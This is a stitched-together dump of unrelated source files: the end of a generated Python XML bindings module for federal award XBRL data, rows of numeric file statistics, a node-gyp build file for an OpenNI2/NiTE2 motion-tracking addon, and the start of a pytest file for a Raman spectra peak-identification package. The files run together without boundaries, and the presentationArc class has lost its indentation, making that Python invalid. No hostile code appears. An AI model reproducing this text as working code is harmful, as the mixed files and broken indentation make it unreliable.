        if node.text is not None:
            obj_ = self.mixedclass_(MixedContainer.CategoryText,
                MixedContainer.TypeNone, '', node.text)
            self.content_.append(obj_)
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        """Collect all not-yet-processed attributes into ``anyAttributes_``."""
        self.anyAttributes_ = {}
        for name, value in attrs.items():
            if name not in already_processed:
                self.anyAttributes_[name] = value
        super(label, self).buildAttributes(node, attrs, already_processed)
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        """Capture wildcard children and their tail text as mixed content."""
        # NOTE(review): the generated wildcard branch matches an empty tag
        # name via ``__ANY__``; kept as generated.
        if nodeName_ == '':
            obj_ = __ANY__.factory()
            obj_.build(child_)
            obj_ = self.mixedclass_(MixedContainer.CategoryComplex,
                MixedContainer.TypeNone, '', obj_)
            self.content_.append(obj_)
            if hasattr(self, 'add_'):
                self.add_(obj_.value)
            elif hasattr(self, 'set_'):
                self.set_(obj_.value)
        if not fromsubclass_ and child_.tail is not None:
            obj_ = self.mixedclass_(MixedContainer.CategoryText,
                MixedContainer.TypeNone, '', child_.tail)
            self.content_.append(obj_)
        super(label, self).buildChildren(child_, node, nodeName_, True)
# end class label
class calculationArc(arcType):
    """Extension of the extended link arc type for calculation arcs. Adds a
    weight attribute to track weights on contributions to
    summations."""
    subclass = None
    superclass = arcType
    def __init__(self, use=None, from_=None, title_attr=None, show=None, arcrole=None, actuate=None, priority=None, to=None, type_=None, order=None, title=None, weight=None):
        self.original_tagname_ = None
        super(calculationArc, self).__init__(use, from_, title_attr, show, arcrole, actuate, priority, to, type_, order, title, )
        self.weight = _cast(None, weight)
    def factory(*args_, **kwargs_):
        """Instantiate the registered subclass override, if any, else this class."""
        if calculationArc.subclass:
            return calculationArc.subclass(*args_, **kwargs_)
        else:
            return calculationArc(*args_, **kwargs_)
    factory = staticmethod(factory)
    def get_weight(self): return self.weight
    def set_weight(self, weight): self.weight = weight
    def hasContent_(self):
        """Content comes only from the arcType base class."""
        if (
            super(calculationArc, self).hasContent_()
        ):
            return True
        else:
            return False
    def export(self, outfile, level, namespace_='finassist:', name_='calculationArc', namespacedef_='', pretty_print=True):
        """Serialize this element and any base-class content to outfile."""
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.original_tagname_ is not None:
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespace_, name_='calculationArc')
        if self.hasContent_():
            outfile.write('>%s' % (eol_, ))
            self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='calculationArc', pretty_print=pretty_print)
            showIndent(outfile, level, pretty_print)
            outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
        else:
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='calculationArc'):
        """Write base-class attributes plus the optional ``weight``."""
        super(calculationArc, self).exportAttributes(outfile, level, already_processed, namespace_, name_='calculationArc')
        if self.weight is not None and 'weight' not in already_processed:
            already_processed.add('weight')
            outfile.write(' weight=%s' % (quote_attrib(self.weight), ))
    def exportChildren(self, outfile, level, namespace_='finassist:', name_='calculationArc', fromsubclass_=False, pretty_print=True):
        super(calculationArc, self).exportChildren(outfile, level, namespace_, name_, True, pretty_print=pretty_print)
    def build(self, node):
        """Populate this object from an element-tree node; returns self."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        """Read ``weight`` then delegate remaining attributes to the base."""
        value = find_attr_value_('weight', node)
        if value is not None and 'weight' not in already_processed:
            already_processed.add('weight')
            self.weight = value
        super(calculationArc, self).buildAttributes(node, attrs, already_processed)
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        super(calculationArc, self).buildChildren(child_, node, nodeName_, True)
        pass
# end class calculationArc
class presentationArc(arcType):
"""Extension of the extended link arc type for presentation arcs. Adds
a preferredLabel attribute that documents the role attribute
value of preferred labels (as they occur in label extended
links)."""
subclass = None
superclass = arcType
def __init__(self, use=None, from_=None, title_attr=None, show=None, arcrole=None, actuate=None, priority=None, to=None, type_=None, order=None, title=None, preferredLabel=None):
self.original_tagname_ = None
super(presentationArc, self).__init__(use, from_, title_attr, show, arcrole, actuate, priority, to, type_, order, title, )
self.preferredLabel = _cast(None, preferredLabel)
def factory(*args_, **kwargs_):
if presentationArc.subclass:
return presentationArc.subclass(*args_, **kwargs_)
else:
return presentationArc(*args_, **kwargs_)
factory = staticmethod(factory)
def get_preferredLabel(self): return self.preferredLabel
def set_preferredLabel(self, preferredLabel): self.preferredLabel = preferredLabel
def hasContent_(self):
if (
super(presentationArc, self).hasContent_()
):
return True
else:
return False
def export(self, outfile, level, namespace_='finassist:', name_='presentationArc', namespacedef_='', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='presentationArc')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='presentationArc', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='presentationArc'):
super(presentationArc, self).exportAttributes(outfile, level, already_processed, namespace_, name_='presentationArc')
if self.preferredLabel is not None and 'preferredLabel' not in already_processed:
already_processed.add('preferredLabel')
outfile.write(' preferredLabel=%s' % (quote_attrib(self.preferredLabel), ))
def exportChildren(self, outfile, level, namespace_='finassist:', name_='presentationArc', fromsubclass_=False, pretty_print=True):
super(presentationArc, self).exportChildren(outfile, level, namespace_, name_, True, pretty_print=pretty_print)
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('preferredLabel', node)
if value is not None and 'preferredLabel' not in already_processed:
already_processed.add('preferredLabel')
self.preferredLabel = value
super(presentationArc, self).buildAttributes(node, attrs, already_processed)
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
    """Dispatch a parsed child element; this subclass defines no extra
    children, so handling is fully delegated to the superclass."""
    super(presentationArc, self).buildChildren(child_, node, nodeName_, True)
# end class presentationArc
# Maps XML tag names to the generated classes that parse them; consulted
# by get_root_tag() to choose a handler for a document's root element.
GDSClassesMapping = {
    'federalFundingAmount': amountItemType,
    'catalogOfFederalDomesticAssistanceProgram': catalogOfFederalDomesticAssistanceProgramComplexType,
    'periodOfPerformancePotentialEndDate': dateItemType,
    'treasuryAccountSymbol': TreasuryAccountSymbolComplexType,
    'labelArc': arcType,
    'awardeeInformation': awardeeInformationComplexType,
    'simple': simpleType,
    'highlyCompensatedOfficerFirstName': stringItemType,
    'referenceArc': arcType,
    'entity': contextEntityType,
    'county': stringItemType,
    'locator': locatorType,
    'arc': arcType,
    'awardDescription': stringItemType,
    'highlyCompensatedOfficerLastName': stringItemType,
    'awardeeAddress': addressComplexType,
    'highlyCompensatedOfficer': highlyCompensatedOfficerComplexType,
    'schemaRef': simpleType,
    'loc': locatorType,
    'ultimateParentUniqueIdentifier': integerItemType,
    'awardeeUniqueIdentifierSupplemental': stringItemType,
    'unitDenominator': measuresType,
    'mainAccountNumber': integerItemType,
    'title': titleType,
    'typeOfTransactionCode': typeOfTransactionCodeItemType,
    'recordType': recordTypeItemType,
    'fundingSubTierAgency': agencyComplexType,
    'agency': agencyComplexType,
    'availabilityTypeCode': availableTypeCodeItemType,
    'awardeeUniqueIdentifier': integerItemType,
    'countryCode': stringItemType,
    'modificationAmendmentNumber': stringItemType,
    'streetAddress': streetAddressComplexType,
    'subAccountSymbol': integerItemType,
    'streetAddressLine': stringItemType,
    'postalCode': stringItemType,
    'awardingSubTierAgency': agencyComplexType,
    'catalogOfFederalDomesticAssistanceTitle': stringItemType,
    'awardeeLegalBusinessName': stringItemType,
    'congressionalDistrict': congressionalDistrictItemType,
    'periodOfPerformanceCurrentEndDate': dateItemType,
    'officeIdentifier': integerItemType,
    'businessType': businessTypeItemType,
    'extended': extendedType,
    'periodOfPerformance': periodOfPerformanceComplexType,
    'unitNumerator': measuresType,
    'city': stringItemType,
    'officeName': stringItemType,
    'awardingAgency': agencyComplexType,
    'highlyCompensatedOfficerMiddleInitial': stringItemType,
    'award': awardComplexType,
    'period': contextPeriodType,
    'countryName': stringItemType,
    'ultimateParentLegalBusinessName': stringItemType,
    'awardAmounts': awardAmountsComplexType,
    'state': stateItemType,
    'agencyOffice': agencyOfficeComplexType,
    'periodOfPerformanceStartDate': dateItemType,
    'address': addressComplexType,
    'periodOfPerformanceActionDate': dateItemType,
    'primaryPlaceOfPerformance': addressComplexType,
    'nonFederalFundingAmount': amountItemType,
    'beginningPeriodOfAvailability': stringItemType,
    'typeOfAction': typeOfActionItemType,
    'fundingAgency': agencyComplexType,
    'forever': foreverType,
    'identifier': identifierType,
    'resource': resourceType,
    'agencyName': stringItemType,
    'scenario': contextScenarioType,
    'parentAwardID': stringItemType,
    'endingPeriodOfAvailability': stringItemType,
    'allocationTransferAgencyIdentifier': integerItemType,
    'zipCodePlus4': stringItemType,
    'documentation': documentationType,
    'highlyCompensatedOfficerCompensation': amountItemType,
    'catalogOfFederalDomesticAssistanceNumber': stringItemType,
    'totalFundingAmount': amountItemType,
    'agencyIdentifier': integerItemType,
    'awardID': stringItemType,
    'definitionArc': arcType,
    'footnoteArc': arcType,
}
# Help text printed by usage() when the command line is malformed.
USAGE_TEXT = """
Usage: python <Parser>.py [ -s ] <in_xml_file>
"""
def usage():
    """Print the command-line usage banner and exit with status 1."""
    sys.stdout.write(USAGE_TEXT + '\n')
    sys.exit(1)
def get_root_tag(node):
    """Return ``(local_tag, handler_class)`` for the element *node*.

    The tag is looked up in ``GDSClassesMapping`` first, then among the
    module-level classes of the same name; the class is ``None`` when
    the tag is unknown to both.
    """
    tag = Tag_pattern_.match(node.tag).groups()[-1]
    return tag, (GDSClassesMapping.get(tag) or globals().get(tag))
def parse(inFileName, silence=False):
    """Parse the XML file *inFileName* and return the built root object.

    Falls back to ``awardComplexType`` when the root tag is not
    recognized. Unless *silence* is true, the tree is re-exported to
    stdout with an XML declaration and the finassist namespace.
    """
    parser = None
    doc = parsexml_(inFileName, parser)
    rootNode = doc.getroot()
    rootTag, rootClass = get_root_tag(rootNode)
    if rootClass is None:
        # Unknown root tag: use the default document class.
        rootTag = 'awardComplexType'
        rootClass = awardComplexType
    rootObj = rootClass.factory()
    rootObj.build(rootNode)
    # Enable Python to collect the space used by the DOM.
    doc = None
    if not silence:
        sys.stdout.write('<?xml version="1.0" ?>\n')
        rootObj.export(
            sys.stdout, 0, name_=rootTag,
            namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25"',
            pretty_print=True)
    return rootObj
def parseEtree(inFileName, silence=False):
    """Parse *inFileName* and also build an etree view of the result.

    Returns ``(rootObj, rootElement, mapping, reverse_mapping)`` where
    ``mapping`` links generated objects to etree nodes and
    ``reverse_mapping`` is its inverse. Unless *silence* is true, the
    document is pretty-printed to stdout.
    """
    parser = None
    doc = parsexml_(inFileName, parser)
    rootNode = doc.getroot()
    rootTag, rootClass = get_root_tag(rootNode)
    if rootClass is None:
        # Unknown root tag: use the default document class.
        rootTag = 'awardComplexType'
        rootClass = awardComplexType
    rootObj = rootClass.factory()
    rootObj.build(rootNode)
    # Enable Python to collect the space used by the DOM.
    doc = None
    mapping = {}
    rootElement = rootObj.to_etree(None, name_=rootTag, mapping_=mapping)
    reverse_mapping = rootObj.gds_reverse_node_mapping(mapping)
    if not silence:
        content = etree_.tostring(
            rootElement, pretty_print=True,
            xml_declaration=True, encoding="utf-8")
        # tostring() returns bytes when an explicit encoding is given;
        # decode before writing to the text-mode stdout (writing bytes
        # raises TypeError on Python 3).
        if isinstance(content, bytes):
            content = content.decode("utf-8")
        sys.stdout.write(content)
        sys.stdout.write('\n')
    return rootObj, rootElement, mapping, reverse_mapping
def parseString(inString, silence=False):
    """Parse XML from the string *inString* and return the root object.

    Falls back to ``awardComplexType`` when the root tag is not
    recognized. Unless *silence* is true, the tree is re-exported to
    stdout (without pretty-printing, matching the original behavior).
    """
    # io.StringIO replaces the Python-2-only StringIO module; the old
    # ``from StringIO import StringIO`` raises ImportError on Python 3.
    from io import StringIO
    parser = None
    doc = parsexml_(StringIO(inString), parser)
    rootNode = doc.getroot()
    rootTag, rootClass = get_root_tag(rootNode)
    if rootClass is None:
        # Unknown root tag: use the default document class.
        rootTag = 'awardComplexType'
        rootClass = awardComplexType
    rootObj = rootClass.factory()
    rootObj.build(rootNode)
    # Enable Python to collect the space used by the DOM.
    doc = None
    if not silence:
        sys.stdout.write('<?xml version="1.0" ?>\n')
        rootObj.export(
            sys.stdout, 0, name_=rootTag,
            namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25"')
    return rootObj
def parseLiteral(inFileName, silence=False):
    """Parse *inFileName* and, unless *silence*, write the result to
    stdout as Python literal source code (via ``exportLiteral``).

    Returns the built root object.
    """
    parser = None
    doc = parsexml_(inFileName, parser)
    rootNode = doc.getroot()
    rootTag, rootClass = get_root_tag(rootNode)
    if rootClass is None:
        # Unknown root tag: use the default document class.
        rootTag = 'awardComplexType'
        rootClass = awardComplexType
    rootObj = rootClass.factory()
    rootObj.build(rootNode)
    # Enable Python to collect the space used by the DOM.
    doc = None
    if not silence:
        sys.stdout.write('#from finassist import *\n\n')
        sys.stdout.write('import finassist as model_\n\n')
        sys.stdout.write('rootObj = model_.rootClass(\n')
        rootObj.exportLiteral(sys.stdout, 0, name_=rootTag)
        sys.stdout.write(')\n')
    return rootObj
def main():
    """Entry point: parse the single XML file named on the command line,
    or print usage and exit when the argument count is wrong."""
    arguments = sys.argv[1:]
    if len(arguments) != 1:
        usage()
    else:
        parse(arguments[0])
# Allow this generated module to be run directly as a script.
if __name__ == '__main__':
    #import pdb; pdb.set_trace()
    main()
# Explicit public API of this generated bindings module.
__all__ = [
    "NCNameItemType",
    "NameItemType",
    "QNameItemType",
    "TreasuryAccountSymbolComplexType",
    "accountPurposeCodeItemType",
    "accountTypeItemType",
    "addressComplexType",
    "agencyComplexType",
    "agencyOfficeComplexType",
    "amountItemType",
    "anyURIItemType",
    "arcType",
    "arcroleRef",
    "arcroleType",
    "availableTypeCodeItemType",
    "awardAmountsComplexType",
    "awardComplexType",
    "awardeeInformationComplexType",
    "base64BinaryItemType",
    "bookTaxDifferenceItemType",
    "booleanItemType",
    "businessTypeItemType",
    "byteItemType",
    "calculationArc",
    "calculationLink",
    "catalogOfFederalDomesticAssistanceProgramComplexType",
    "congressionalDistrictItemType",
    "context",
    "contextEntityType",
    "contextPeriodType",
    "contextScenarioType",
    "dateItemType",
    "dateTimeItemType",
    "debitCreditCodeItemType",
    "decimalItemType",
    "definitionLink",
    "divide",
    "documentTypeItemType",
    "documentationType",
    "doubleItemType",
    "durationItemType",
    "entriesTypeItemType",
    "entryTypeItemType",
    "extendedType",
    "floatItemType",
    "footnote",
    "footnoteLink",
    "foreverType",
    "fractionItemType",
    "gDayItemType",
    "gMonthDayItemType",
    "gMonthItemType",
    "gYearItemType",
    "gYearMonthItemType",
    "hexBinaryItemType",
    "highlyCompensatedOfficerComplexType",
    "identifierOrganizationTypeItemType",
    "identifierType",
    "identifierTypeItemType",
    "intItemType",
    "integerItemType",
    "invoiceTypeItemType",
    "label",
    "labelLink",
    "languageItemType",
    "linkbase",
    "linkbaseRef",
    "locatorType",
    "longItemType",
    "mainAccountTypeItemType",
    "measuresType",
    "monetaryItemType",
    "negativeIntegerItemType",
    "nonNegativeIntegerItemType",
    "nonPositiveIntegerItemType",
    "normalizedStringItemType",
    "periodOfPerformanceComplexType",
    "phoneNumberDescriptionItemType",
    "positiveIntegerItemType",
    "postingStatusItemType",
    "presentationArc",
    "presentationLink",
    "pureItemType",
    "qualifierEntryItemType",
    "recordTypeItemType",
    "reference",
    "referenceLink",
    "resourceType",
    "revisesUniqueIDActionItemType",
    "roleRef",
    "roleType",
    "segment",
    "sharesItemType",
    "shortItemType",
    "signOfAmountItemType",
    "simpleType",
    "sourceJournalIDItemType",
    "stateItemType",
    "streetAddressComplexType",
    "stringItemType",
    "timeItemType",
    "titleType",
    "tokenItemType",
    "typeOfActionItemType",
    "typeOfTransactionCodeItemType",
    "unit",
    "unsignedByteItemType",
    "unsignedIntItemType",
    "unsignedLongItemType",
    "unsignedShortItemType",
    "xbrl",
    "xbrlIncludeItemType"
]
| 48.936206
| 464
| 0.640074
| 64,120
| 614,443
| 5.884935
| 0.011962
| 0.069836
| 0.016791
| 0.025711
| 0.831845
| 0.804538
| 0.782799
| 0.754326
| 0.745594
| 0.731527
| 0
| 0.004811
| 0.254483
| 614,443
| 12,555
| 465
| 48.940104
| 0.818939
| 0.012673
| 0
| 0.771277
| 1
| 0.008976
| 0.085675
| 0.016715
| 0
| 0
| 0
| 0
| 0
| 1
| 0.175947
| false
| 0.014461
| 0.000914
| 0.037317
| 0.267786
| 0.066656
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
cb5dd0d1f09b0b40c7950d5a3086cbc055c02423
| 6,252
|
gyp
|
Python
|
binding.gyp
|
bengfarrell/nuimotion
|
7117c251389b68e2e5d1b8fb8fb1ccd0550b5a77
|
[
"MIT"
] | 21
|
2015-01-28T23:41:08.000Z
|
2021-03-03T23:19:55.000Z
|
binding.gyp
|
bengfarrell/nuimotion
|
7117c251389b68e2e5d1b8fb8fb1ccd0550b5a77
|
[
"MIT"
] | 3
|
2015-08-30T11:37:52.000Z
|
2020-10-16T13:57:59.000Z
|
binding.gyp
|
bengfarrell/nuimotion
|
7117c251389b68e2e5d1b8fb8fb1ccd0550b5a77
|
[
"MIT"
] | 8
|
2015-03-03T15:46:35.000Z
|
2018-02-05T04:00:20.000Z
|
{
"variables": {
# Be sure to create OPENNI2 and NITE2 system vars
"OPENNI2%": "$(OPENNI2)",
"NITE2%": "$(NITE2)"
},
"targets": [
{
"target_name":"copy-files",
"conditions": [
[ "OS=='win'", {
"copies": [
{ "files": [ "<(OPENNI2)/Redist/OpenNI2/Drivers/Kinect.dll",
"<(OPENNI2)/Redist/OpenNI2/Drivers/OniFile.dll",
"<(OPENNI2)/Redist/OpenNI2/Drivers/PS1080.dll",
"<(OPENNI2)/Redist/OpenNI2/Drivers/PS1080.ini",
"<(OPENNI2)/Redist/OpenNI2/Drivers/PSLink.dll",
"<(OPENNI2)/Redist/OpenNI2/Drivers/PSLink.ini"],
"destination": "<(module_root_dir)/build/Release/OpenNI2/Drivers/"
},
# If NITE folder is not placed at root of project, it cannot be accessed
# go up through node_modules to project root and drop in NiTE2 folder
{ "files": [ "<(NITE2)/Redist/NiTE2/Data/lbsdata.idx",
"<(NITE2)/Redist/NiTE2/Data/lbsdata.lbd",
"<(NITE2)/Redist/NiTE2/Data/lbsparam1.lbd",
"<(NITE2)/Redist/NiTE2/Data/lbsparam2.lbd"],
"destination": "<(module_root_dir)/../../NiTE2/Data/"
},
{ "files": [ "<(NITE2)/Redist/NiTE2/FeatureExtraction.ini",
"<(NITE2)/Redist/NiTE2/h.dat",
"<(NITE2)/Redist/NiTE2/HandAlgorithms.ini",
"<(NITE2)/Redist/NiTE2/s.dat"],
"destination": "<(module_root_dir)/../../NiTE2/"
},
{ "files": [ "<(OPENNI2)/Redist/OpenNI2.dll",
"<(OPENNI2)/Redist/OpenNI.ini",
"<(NITE2)/Redist/NiTE2.dll",
"<(NITE2)/Redist/NiTE.ini" ],
"destination": "<(module_root_dir)/build/Release/"
}
],
"libraries": ["-l<(OPENNI2)/Lib/OpenNI2", "-l<(NITE2)/Lib/NiTE2"]
}],
["OS=='mac'", {
"copies": [
{ "files": [ "<(OPENNI2)/Redist/OpenNI2/Drivers/libOniFile.dylib",
"<(OPENNI2)/Redist/OpenNI2/Drivers/libPS1080.dylib",
"<(OPENNI2)/Redist/OpenNI2/Drivers/PS1080.ini",
"<(OPENNI2)/Redist/OpenNI2/Drivers/PSLink.ini"],
"destination": "<(module_root_dir)/build/Release/OpenNI2/Drivers/"
},
# If NITE folder is not placed at root of project, it cannot be accessed
# go up through node_modules to project root and drop in NiTE2 folder
{ "files": [ "<(NITE2)/Redist/NiTE2/Data/lbsdata.idx",
"<(NITE2)/Redist/NiTE2/Data/lbsdata.lbd",
"<(NITE2)/Redist/NiTE2/Data/lbsparam1.lbd",
"<(NITE2)/Redist/NiTE2/Data/lbsparam2.lbd"],
"destination": "<(module_root_dir)/../../NiTE2/Data/"
},
{ "files": [ "<(NITE2)/Redist/NiTE2/FeatureExtraction.ini",
"<(NITE2)/Redist/NiTE2/h.dat",
"<(NITE2)/Redist/NiTE2/HandAlgorithms.ini",
"<(NITE2)/Redist/NiTE2/s.dat"],
"destination": "<(module_root_dir)/../../NiTE2/"
},
{ "files": [ "<(OPENNI2)/Redist/libOpenNI2.dylib",
"<(OPENNI2)/Redist/OpenNI.ini",
"<(NITE2)/Redist/libNiTE2.dylib",
"<(NITE2)/Redist/NiTE.ini" ],
"destination": "<(module_root_dir)/build/Release/"
}
]
}],
["OS=='linux'", {
"copies": [
{ "files": [ "<(OPENNI2)/Redist/OpenNI2/Drivers/libOniFile.so",
"<(OPENNI2)/Redist/OpenNI2/Drivers/libPS1080.so",
"<(OPENNI2)/Redist/OpenNI2/Drivers/PS1080.ini",
"<(OPENNI2)/Redist/OpenNI2/Drivers/PSLink.ini"],
"destination": "<(module_root_dir)/build/Release/OpenNI2/Drivers/"
},
# If NITE folder is not placed at root of project, it cannot be accessed
# go up through node_modules to project root and drop in NiTE2 folder
{ "files": [ "<(NITE2)/Redist/NiTE2/Data/lbsdata.idx",
"<(NITE2)/Redist/NiTE2/Data/lbsdata.lbd",
"<(NITE2)/Redist/NiTE2/Data/lbsparam1.lbd",
"<(NITE2)/Redist/NiTE2/Data/lbsparam2.lbd"],
"destination": "<(module_root_dir)/../../NiTE2/Data/"
},
{ "files": [ "<(NITE2)/Redist/NiTE2/FeatureExtraction.ini",
"<(NITE2)/Redist/NiTE2/h.dat",
"<(NITE2)/Redist/NiTE2/HandAlgorithms.ini",
"<(NITE2)/Redist/NiTE2/s.dat"],
"destination": "<(module_root_dir)/../../NiTE2/"
},
{ "files": [ "<(OPENNI2)/Redist/libOpenNI2.so",
"<(OPENNI2)/Redist/OpenNI.ini",
"<(NITE2)/Redist/libNiTE2.so",
"<(NITE2)/Redist/NiTE.ini" ],
"destination": "<(module_root_dir)/build/Release/"
}
]
}]
]
},
{
"target_name": "nuimotion",
"sources": [
"src/Main.cpp",
"src/enums/EnumMapping.cpp",
"src/gestures/GestureRecognizer.cpp",
"src/gestures/Swipe.cpp",
"src/gestures/Wave.cpp" ],
"conditions": [
[ "OS=='win'", {
"libraries": ["-l<(OPENNI2)/Lib/OpenNI2", "-l<(NITE2)/Lib/NiTE2"]
}],
["OS=='mac'", {
"libraries": ["<(OPENNI2)/Tools/libOpenNI2.dylib", "<(NITE2)/Redist/libNiTE2.dylib"]
}],
["OS=='linux'", {
"libraries": ["<(OPENNI2)/Tools/libOpenNI2.so", "<(NITE2)/Redist/libNiTE2.so"]
}],
],
"include_dirs": [ "./src/enums", "./build/Release", "<(OPENNI2)/Include/", "<(NITE2)/Include/" ],
},
{
"target_name": "nuimotion-depth",
"sources": [
"src/Depth.cpp",
"src/enums/EnumMapping.cpp",
"src/gestures/GestureRecognizer.cpp",
"src/gestures/Swipe.cpp",
"src/gestures/Wave.cpp" ],
"conditions": [
[ "OS=='win'", {
"libraries": ["-l<(OPENNI2)/Lib/OpenNI2"]
}],
["OS=='mac'", {
"libraries": ["<(OPENNI2)/Tools/libOpenNI2.dylib"]
}],
["OS=='linux'", {
"libraries": ["<(OPENNI2)/Tools/libOpenNI2.so"]
}],
],
"include_dirs": [ "<(OPENNI2)/Include/"]
}
]
}
| 35.931034
| 102
| 0.508317
| 587
| 6,252
| 5.359455
| 0.153322
| 0.111888
| 0.127146
| 0.120153
| 0.885887
| 0.848061
| 0.813096
| 0.73363
| 0.705022
| 0.705022
| 0
| 0.037903
| 0.295266
| 6,252
| 173
| 103
| 36.138728
| 0.676123
| 0.074216
| 0
| 0.605634
| 0
| 0
| 0.594983
| 0.475779
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
cbbe1609a4f2d2f3ae7f071eb98128dcb1c941f9
| 38,987
|
py
|
Python
|
ramandecompy/tests/test_peakidentify.py
|
kernb2/raman-spectra-decomp-analysis
|
9ee09021e8e57735209812b062607de7e123beea
|
[
"MIT"
] | 14
|
2019-04-23T19:09:56.000Z
|
2022-03-19T16:51:41.000Z
|
ramandecompy/tests/test_peakidentify.py
|
kernb2/raman-spectra-decomp-analysis
|
9ee09021e8e57735209812b062607de7e123beea
|
[
"MIT"
] | 53
|
2019-04-23T19:55:35.000Z
|
2020-05-20T03:43:11.000Z
|
ramandecompy/tests/test_peakidentify.py
|
kernb2/raman-spectra-decomp-analysis
|
9ee09021e8e57735209812b062607de7e123beea
|
[
"MIT"
] | 10
|
2020-03-31T18:37:52.000Z
|
2022-02-12T23:14:16.000Z
|
"""
Module used to unit test the functionality and outputs of the peakidentify.py module
"""
# IMPORTING MODULES
import os
import h5py
import numpy as np
import pandas as pd
from ramandecompy import peakidentify
from ramandecompy import dataprep
hdf5_calfilename = 'ramandecompy/tests/test_files/peakidentify_calibration_test.hdf5'
hdf5_expfilename = 'ramandecompy/tests/test_files/peakidentify_experiment_test.hdf5'
key = '300C/25s'
calhdf5 = h5py.File(hdf5_calfilename, 'r+')
exphdf5 = h5py.File(hdf5_expfilename, 'r+')
hdf5_filename = 'ramandecompy/tests/test_files/peakidentify_add_label_test.hdf5'
key = '300C/25s'
peak = 'Peak_01'
label = '[Hydrogen]'
# open hdf5 file as read/write
hdf5 = h5py.File(hdf5_filename, 'r+')
def test_peak_assignment():
    """
    This function tests the operation of the peak_assignment
    function in peakidentify.py
    """
    #First, generate a testing dataset.
    hdf5_calfilename = 'ramandecompy/tests/test_files/peakidentify_calibration_test.hdf5'
    hdf5_expfilename = 'ramandecompy/tests/test_files/peakidentify_experiment_test.hdf5'
    key = '300C/25s'
    calhdf5 = h5py.File(hdf5_calfilename, 'r+')
    exphdf5 = h5py.File(hdf5_expfilename, 'r+')
    unknown_x = list(exphdf5['{}/wavenumber'.format(key)])
    unknown_y = list(exphdf5['{}/counts'.format(key)])
    unknown_x = np.asarray(unknown_x)
    unknown_y = np.asarray(unknown_y)
    precision = 10
    external_peak_labels = []
    peakidentify.peak_assignment(hdf5_expfilename,
                                 key, hdf5_calfilename,
                                 external_peak_labels,
                                 precision, False, plot = False)
    #Various try statements to make sure that bad inputs are handled correctly.
    # NOTE(review): this first try repeats the *valid* call above, so no
    # TypeError can be raised and the except branch is dead code -- confirm
    # which argument was meant to be invalid here.
    try:
        peakidentify.peak_assignment(hdf5_expfilename,
                                     key, hdf5_calfilename,
                                     external_peak_labels,
                                     precision, False, plot = False)
    except TypeError:
        print("An invalid known_compound_list was passed to the function, "
              "and it was handled well with a TypeError.")
    try:
        peakidentify.peak_assignment(hdf5_expfilename,
                                     key, hdf5_calfilename,
                                     'external_peak_labels',
                                     precision, False, plot = False)
    except TypeError:
        print("An invalid external_peak_labels value was passed to the function, and "
              "it was handled well with a TypeError.")
    try:
        peakidentify.peak_assignment(hdf5_expfilename,
                                     key, hdf5_calfilename,
                                     external_peak_labels,
                                     'precision', False, plot = False)
    except TypeError:
        print("An invalid precision value was passed to the function, and "
              "it was handled well with a TypeError.")
    try:
        peakidentify.peak_assignment(hdf5_expfilename,
                                     key, hdf5_calfilename,
                                     external_peak_labels,
                                     precision, 'False', plot = False)
    except TypeError:
        print("An invalid export_label_input value was passed to the function, and it "
              "was handled well with a TypeError.")
    try:
        peakidentify.peak_assignment(hdf5_expfilename,
                                     key, hdf5_calfilename,
                                     external_peak_labels,
                                     precision, False, 'False')
    except TypeError:
        print("An invalid plot value was passed to the function, and it "
              "was handled well with a TypeError.")
    calhdf5.close()
    exphdf5.close()
    # make assertions
def test_compare_unknown_to_known():
    """
    This function tests the operation of the compare_unknown_to_known
    function in peakidentify.py
    """
    #First, generate a testing dataset.
    hdf5_calfilename = 'ramandecompy/tests/test_files/peakidentify_calibration_test.hdf5'
    hdf5_expfilename = 'ramandecompy/tests/test_files/peakidentify_experiment_test.hdf5'
